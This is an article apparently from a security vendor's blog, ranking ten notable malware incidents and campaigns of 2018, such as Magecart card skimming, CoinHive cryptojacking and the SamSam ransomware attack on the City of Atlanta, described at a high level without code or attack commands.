Top 10 Malware Incidents and Campaigns of 2018
Ransomware and cryptominers of continuously growing complexity remained one of the most expensive cybersecurity problems in 2018.
Despite more than 50 different anti-malware product vendors, and advances in the use of AI-enhanced detection techniques that promise to detect both known and unknown malware, malware remains a significant threat to the almost 2 billion websites around the world.
In March 2018, Sitelock reported around 18.5 million websites are infected with some form of malware at any time, and the average website is attacked 44 times every day. Here we list ten of the more high-profile successful malware infections and campaigns of 2018.
10: Voter details stolen and encrypted in ransomware attack on California newspaper
When: January 2018
Who was affected: The Sacramento Bee newspaper; 19.5 million voters, 53,000 subscribers.
Type of malware: Ransomware.
An independent ransomware attack hit the Sacramento Bee, a Californian newspaper in January. A hacker gained access to two databases stored on a third-party server, locking them down and demanding a ransom in Bitcoin for an undisclosed amount.
The compromised databases included the voter records of 19.5 million Californians, as well as personal contact information on a further 53,000 subscribers to the Bee. Although the infection and data breach were technically successful, the attempted ransom failed as the Bee simply deleted the databases to prevent any further breaches.
It is believed the attack occurred after the server’s firewall failed to go back online after standard maintenance.
9: Destructive wiper Shamoon resurfaces in Middle East
When: November-December 2018
Who was affected: Saipem, fossil fuel company and undisclosed others.
Type of malware: Data scanner/wiper.
Shamoon, also known as Disttrack, first appeared in 2012, primarily targeting organizations in the Middle East. In the first major attack in 2012, 30,000 endpoints belonging to oil firm Saudi Aramco had their hard drives wiped.
There have been suggestions that Shamoon has its origins in the U.S./Israeli Stuxnet attack on Iranian nuclear facilities. Shamoon was developed and used in retaliation against U.S. allies in the Middle East.
The malware scans files on an infected computer and reports them to the attacker, then erases some or all the computer’s files and the master boot record, preventing the machine from rebooting.
Incidents involving Shamoon had significantly reduced over the last two years, until November saw a reported resurgence in Saudi Arabia. Specific organizations affected by the virus were not disclosed, but further instances continued to crop up. In December, Saipem reported that it had been hit with a variant of Shamoon on 300 of its servers, affecting some of its operations.
More recently, a new sample of the virus was uploaded to VirusTotal from the Netherlands, though there do not seem to be any victims of this new variant so far.
8: Australian recruitment firm PageUp affected by unnamed malware
When: May 2018
Who was affected: BP and possibly multiple other PageUp clients.
Type of malware: Undisclosed.
Melbourne-based PageUp People provides HR and recruitment cloud services to various clients across the world, including BP, Telstra, Lindt and Zurich. In May, suspicious activity in PageUp’s systems was detected. Later, this was determined to be a malware infection and cause of a potential personal data breach. PageUp did not disclose any information on the malware except to say it had been purged from their systems and was now detectable by their antivirus.
Several of PageUp’s clients closed down their recruitment pages. In November 2018 the firm provided further information on the breach – claiming that there was no evidence that the attackers had exfiltrated any personal data on its 2.6 million active users. Although the attackers had successfully breached the system and had installed data exfiltration tools, PageUp claimed that nothing had been stolen – or at least, there was no evidence of anything being stolen.
7: 2,000 WordPress affected by keylogger and cryptominer
When: January 2018
Who was affected: 2,000 WordPress sites.
Type of malware: keylogging and cryptojacking scripts.
January saw WordPress hit with a follow-up attack to last December’s keylogging campaign which infected 5,400 WordPress sites. This year, a further 2,000 were infected with an updated version of the malicious script. Visitors to the infected site would have their WordPress login credentials recorded and reported to a third-party server.
The sites were usually running older insecure versions of WordPress, or older and exploitable themes or plugins.
The keylogger was bundled with a cryptojacking script which would cause visitors’ computers to mine cryptocurrency on behalf of the attacker. This script is part of a much wider epidemic of cryptojacking in 2018 which we will revisit later in this list.
6: Cryptomining trojans in Mediaget torrent blocked by Windows Defender
When: March 2018
Who was affected: 400,000 users’ PCs targeted.
Type of malware: A variant of the Dofoil/Smoke Loader malware.
In early March, Microsoft released a blog post reporting a large number of suspected trojans had been blocked by Windows Defender. The malware was intended to deposit remotely controlled cryptomining software on the victims’ PCs, channeling cryptocurrency back to the attacker. The attack targeted users worldwide, but the majority of affected users appear to be located in Russia, Turkey and Northern Asia.
The attack grew from an initial 80,000 targets to over 400,000. Microsoft later released further information, pointing to an infected update to the Mediaget torrent client as the vector for the trojan. Quick detection and security updates appear to have stifled the attack before it could see widespread success.
5: Widespread ransomware attacks on medical institutions
When: Throughout 2018
Who was affected: Hundreds of thousands of patients at various medical organizations.
Type of malware: Ransomware.
Medical institutions have been a growing target for ransomware attacks. The highly sensitive data processed by many such organizations, and the critical nature of continuous systems availability, make them an attractive target for extortion. From 2016 to 2017, ransomware attacks against healthcare groups increased by 89%.
This trend seems to have continued into 2018, with several damaging attacks against various targets throughout the year. The California Center for Orthopedic Specialists, Blue Springs Family Care in Missouri and the Fetal Diagnostic Institute of the Pacific are just a few of the victims. Some of the affected organizations pay the ransom, while others attempt to recover without paying. Whatever the case, these attacks inhibit the operations of healthcare providers and expose highly sensitive data of vulnerable people.
4: Magento e-commerce platform users infected with payment detail skimmer
When: March-August 2018
Who was affected: Over 7,000 online shops.
Type of malware: Keylogger/Payment information skimmer.
Magento is an open-source e-commerce platform, and among the most prevalent third-party e-commerce platforms on the internet. Magento-powered websites process large amounts of customers’ personal and payment data. In August 2018, security researcher and cofounder of Byte.nl Willem de Groot discovered a widespread malware campaign affecting websites using Magento.
3: Multiple Magecart payment detail attacks throughout 2018
When: Throughout 2018
Who was affected: Thousands of websites; most prominently British Airways and Ticketmaster
Type of malware: Credit card skimmer.
The term ‘Magecart’ refers to both the malware itself and the various groups of threat actors employing it. Flashpoint and RiskIQ have identified at least seven groups, each with a different method of operation.
Magecart malware has infected numerous websites over 2018. E-commerce plugin Feedify reported in September that the malicious script had infiltrated its code, infecting 4,000 websites.
Magecart is most often cited as the cause of the Ticketmaster and British Airways breaches, the latter of which has appeared in our list of top 10 app-sec breaches of 2018. These breaches alone may have compromised over half a million payment cards.
The Magecart groups have seen such success with their skimming malware that they have begun competing. In November, security researchers reported that one Magecart group’s malware contained code to sabotage other groups’ skimmers.
2: The 2018 CoinHive cryptojacking epidemic
When: Throughout 2018
Who was affected: Many victims across the whole internet.
Type of malware: Cryptojacking.
CoinHive is undoubtedly 2018’s most prolific cryptojacking malware. It’s a somewhat unusual case, as CoinHive does not appear to have been initially conceived as malware. While still somewhat dubious, CoinHive presents itself as a legitimate method of monetizing webpages, by turning visitors’ CPUs to the task of mining Monero for the domain holder. However, this has been turned into malware by various malicious actors. It has reached the point where the service has been named as the top malicious threat to web users, and its presence is detected as malware by anti-virus products
Small to moderate malicious CoinHive infections have become nearly monthly news throughout 2018. In February, thousands of websites including various UK government services and the data protection regulator’s own website were infected with CoinHive malware. As of August, it’s estimated that CoinHive is generating over $250,000 every month. It’s likely that the majority of this is going to malicious cryptojackers injecting it into other websites.
1: SamSam ransomware and the City of Atlanta
When: March 2018
Who was affected: Multiple websites, the most damage done to the city of Atlanta.
Type of malware: SamSam Ransomware
The ransomware attack on the City of Atlanta did not cause immense damage in terms of compromised voter details or a data breach. However, it is certainly this year’s most costly ransomware attack and a vivid demonstration of how ransomware can cripple an organization – even if that organization is an entire city’s government.
SamSam is a specialized ransomware employed against specific targets, and one of 2018’s biggest threats on the web. Its success is largely due to the targeting. The SamSam group compromises targets, reconnoiters the infrastructure, seeks to disguise its presence, and then does as much damage (file encryption) as possible – including, where possible, destruction of backups.
As of late November, the FBI estimated that SamSam had caused $30 million worth of damage to its targets across the US.
The City of Atlanta is the most high-profile victim. The ransomware shut down both critical and non-critical city government systems, leaving some sections of the administration at a standstill. The ransom demand was set at approximately $50,000 in Bitcoin, but this was not paid. Instead, the city set about restoring its systems and recovering the damage under its own power. According to a document obtained by the Atlanta Constitution-Journal, as of August 2018, the recovery was projected to cost $17 million.
In November 2018, the U.S. Department of Justice charged two Iranians with developing and operating SamSam. With no extradition treaty between the U.S. and Iran it unlikely that the two will ever be arrested unless they leave their native country. However, the SamSam modus operandi has been so successful that it is now being copied by other hackers and other ransomware – notably BitPaymer and Ryuk.